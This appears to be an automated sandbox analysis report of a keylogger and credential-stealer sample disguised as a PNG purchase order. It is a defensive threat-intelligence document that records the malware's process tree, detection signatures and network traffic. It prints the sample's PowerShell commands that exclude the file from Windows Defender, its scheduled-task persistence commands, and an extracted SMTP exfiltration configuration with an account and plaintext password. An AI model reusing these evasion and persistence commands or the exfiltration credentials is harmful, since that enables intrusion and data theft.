Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ_PO_98473009.png.exe

Overview

General Information

Sample name:RFQ_PO_98473009.png.exe
Analysis ID:1632428
MD5:1fdcb2296296dd785f8a6306525adf2d
SHA1:e27206dc4673d75417acf22aeec8f2ef18813fe1
SHA256:9525ab40a71a0892815a416b4a10faea2594349b0f61c3ac16d53c17883d75a4
Tags:exeuser-threatcat_ch
Infos:

Detection

MSIL Logger, MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RFQ_PO_98473009.png.exe (PID: 7376 cmdline: "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe" MD5: 1FDCB2296296DD785F8A6306525ADF2D)
    • powershell.exe (PID: 7496 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8100 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7596 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp2D18.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RFQ_PO_98473009.png.exe (PID: 7776 cmdline: "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe" MD5: 1FDCB2296296DD785F8A6306525ADF2D)
    • RFQ_PO_98473009.png.exe (PID: 7784 cmdline: "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe" MD5: 1FDCB2296296DD785F8A6306525ADF2D)
    • RFQ_PO_98473009.png.exe (PID: 7792 cmdline: "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe" MD5: 1FDCB2296296DD785F8A6306525ADF2D)
      • Native_New-Nova.exe (PID: 7852 cmdline: "C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe" MD5: B25A05357AE8104F3D41F8DC1AAA28AE)
      • Native_snake01.exe (PID: 7944 cmdline: "C:\Users\user\AppData\Local\Temp\Native_snake01.exe" MD5: 0C8E94A89D78431A3F4EBFD9C00C8DB8)
  • svchost.exe (PID: 7904 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • lVbhkOPdhyxT.exe (PID: 8052 cmdline: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe MD5: 1FDCB2296296DD785F8A6306525ADF2D)
    • schtasks.exe (PID: 5700 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp4227.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • lVbhkOPdhyxT.exe (PID: 4024 cmdline: "C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe" MD5: 1FDCB2296296DD785F8A6306525ADF2D)
      • Native_New-Nova.exe (PID: 3000 cmdline: "C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe" MD5: B25A05357AE8104F3D41F8DC1AAA28AE)
      • Native_snake01.exe (PID: 2524 cmdline: "C:\Users\user\AppData\Local\Temp\Native_snake01.exe" MD5: 0C8E94A89D78431A3F4EBFD9C00C8DB8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "phatbills@xma0.com", "Password": "london@1759", "Host": "mail.xma0.com", "Port": "587"}

Threatname: MassLogger

{"EXfil Mode": "SMTP", "From": "path@xma0.com", "Password": "london@1759", "Server": "mail.xma0.com"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "phatbills@xma0.com", "Password": "london@1759", "Host": "mail.xma0.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 4F 88 44 24 2B 88 44 24 2F B0 B9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
C:\Users\user\AppData\Local\Temp\Native_snake01.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.3625599331.00000000025C4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000C.00000002.3625599331.00000000025C4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
          0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 127 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            18.2.Native_New-Nova.exe.2232746.2.raw.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
              18.2.Native_New-Nova.exe.2232746.2.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                18.2.Native_New-Nova.exe.2232746.2.raw.unpackJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
                  18.2.Native_New-Nova.exe.2232746.2.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    18.2.Native_New-Nova.exe.2232746.2.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      Click to see the 389 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", ParentImage: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe, ParentProcessId: 7376, ParentProcessName: RFQ_PO_98473009.png.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", ProcessId: 7496, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", ParentImage: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe, ParentProcessId: 7376, ParentProcessName: RFQ_PO_98473009.png.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", ProcessId: 7496, ProcessName: powershell.exe
                      Sigma detected: Suspicious Add Scheduled Task Parent
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp4227.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp4227.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe, ParentImage: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe, ParentProcessId: 8052, ParentProcessName: lVbhkOPdhyxT.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp4227.tmp", ProcessId: 5700, ProcessName: schtasks.exe
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp2D18.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp2D18.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", ParentImage: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe, ParentProcessId: 7376, ParentProcessName: RFQ_PO_98473009.png.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp2D18.tmp", ProcessId: 7596, ProcessName: schtasks.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", ParentImage: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe, ParentProcessId: 7376, ParentProcessName: RFQ_PO_98473009.png.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", ProcessId: 7496, ProcessName: powershell.exe
                      Sigma detected: Windows Processes Suspicious Parent Directory
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7904, ProcessName: svchost.exe

                      Persistence and Installation Behavior

                      barindex
                      Sigma detected: Scheduled temp file as task from temp location
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp2D18.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp2D18.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe", ParentImage: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe, ParentProcessId: 7376, ParentProcessName: RFQ_PO_98473009.png.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp2D18.tmp", ProcessId: 7596, ProcessName: schtasks.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-07T23:40:05.126761+010028033053Unknown Traffic192.168.2.449720104.21.64.1443TCP
                      2025-03-07T23:40:18.685568+010028033053Unknown Traffic192.168.2.449733104.21.64.1443TCP
                      2025-03-07T23:40:20.683459+010028033053Unknown Traffic192.168.2.449735104.21.64.1443TCP
                      2025-03-07T23:40:21.517793+010028033053Unknown Traffic192.168.2.449737104.21.64.1443TCP
                      2025-03-07T23:40:23.483791+010028033053Unknown Traffic192.168.2.449739104.21.64.1443TCP
                      2025-03-07T23:40:24.347356+010028033053Unknown Traffic192.168.2.449741104.21.64.1443TCP
                      2025-03-07T23:40:32.113259+010028033053Unknown Traffic192.168.2.449751104.21.64.1443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-07T23:39:58.253700+010028032742Potentially Bad Traffic192.168.2.449713193.122.130.080TCP
                      2025-03-07T23:39:58.834712+010028032742Potentially Bad Traffic192.168.2.449714193.122.130.080TCP
                      2025-03-07T23:40:02.968173+010028032742Potentially Bad Traffic192.168.2.449713193.122.130.080TCP
                      2025-03-07T23:40:12.245161+010028032742Potentially Bad Traffic192.168.2.449726193.122.130.080TCP
                      2025-03-07T23:40:12.374503+010028032742Potentially Bad Traffic192.168.2.449719193.122.130.080TCP
                      2025-03-07T23:40:14.093249+010028032742Potentially Bad Traffic192.168.2.449721193.122.130.080TCP
                      2025-03-07T23:40:16.515192+010028032742Potentially Bad Traffic192.168.2.449719193.122.130.080TCP
                      2025-03-07T23:40:19.218334+010028032742Potentially Bad Traffic192.168.2.449736193.122.130.080TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-07T23:40:34.545131+010018100071Potentially Bad Traffic192.168.2.449753149.154.167.220443TCP
                      2025-03-07T23:40:44.209570+010018100071Potentially Bad Traffic192.168.2.449759149.154.167.220443TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: RFQ_PO_98473009.png.exeAvira: detected
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeAvira: detection malicious, Label: TR/Kryptik.ykxbx
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAvira: detection malicious, Label: HEUR/AGEN.1305924
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                      Found malware configuration
                      Source: 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "phatbills@xma0.com", "Password": "london@1759", "Host": "mail.xma0.com", "Port": "587"}
                      Source: 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "phatbills@xma0.com", "Password": "london@1759", "Host": "mail.xma0.com", "Port": "587", "Version": "4.4"}
                      Source: 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "path@xma0.com", "Password": "london@1759", "Server": "mail.xma0.com"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeReversingLabs: Detection: 87%
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeVirustotal: Detection: 60%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeReversingLabs: Detection: 87%
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeVirustotal: Detection: 84%Perma Link
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeReversingLabs: Detection: 52%
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeVirustotal: Detection: 51%Perma Link
                      Multi AV Scanner detection for submitted file
                      Source: RFQ_PO_98473009.png.exeVirustotal: Detection: 51%Perma Link
                      Source: RFQ_PO_98473009.png.exeReversingLabs: Detection: 52%
                      Joe Sandbox ML detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                      Sample uses string decryption to hide its real strings
                      Source: 12.2.Native_snake01.exe.4a50000.5.raw.unpackString decryptor: phatbills@xma0.com
                      Source: 12.2.Native_snake01.exe.4a50000.5.raw.unpackString decryptor: london@1759
                      Source: 12.2.Native_snake01.exe.4a50000.5.raw.unpackString decryptor: mail.xma0.com
                      Source: 12.2.Native_snake01.exe.4a50000.5.raw.unpackString decryptor: phatbills2@xma0.com
                      Source: 12.2.Native_snake01.exe.4a50000.5.raw.unpackString decryptor: 587
                      Source: 12.2.Native_snake01.exe.4a50000.5.raw.unpackString decryptor:

                      Location Tracking

                      barindex
                      Tries to detect the country of the analysis system (by using the IP)
                      Source: unknownDNS query: name: reallyfreegeoip.org
                      Source: RFQ_PO_98473009.png.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49715 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49716 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49729 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49730 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49759 version: TLS 1.2
                      Source: RFQ_PO_98473009.png.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: _.pdb source: Native_New-Nova.exe, 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3634096660.0000000003611000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000003.1209065105.0000000000769000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3630979840.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623045015.00000000021F1000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000003.1263456666.0000000000628000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000003.1263777573.0000000000628000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3620379539.0000000001F80000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h10_2_0200E228
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 04BF93DAh10_2_04BF8FA8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 04BF8C81h10_2_04BF89D0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 04BF93DAh10_2_04BF9307
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF5185h10_2_05DF4E48
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DFF878h10_2_05DFF5D0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF7CA0h10_2_05DF79F8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF4C99h10_2_05DF49F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF4841h10_2_05DF4598
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF7848h10_2_05DF75A0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF73F0h10_2_05DF7148
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF43E9h10_2_05DF4140
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DFF420h10_2_05DFF178
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DFEFC8h10_2_05DFED20
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DFEB70h10_2_05DFE8C8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF6F98h10_2_05DF6CF0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF3F91h10_2_05DF3CE8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF6B40h10_2_05DF6898
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF3B39h10_2_05DF3890
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 4x nop then jmp 05DF66E8h10_2_05DF6440
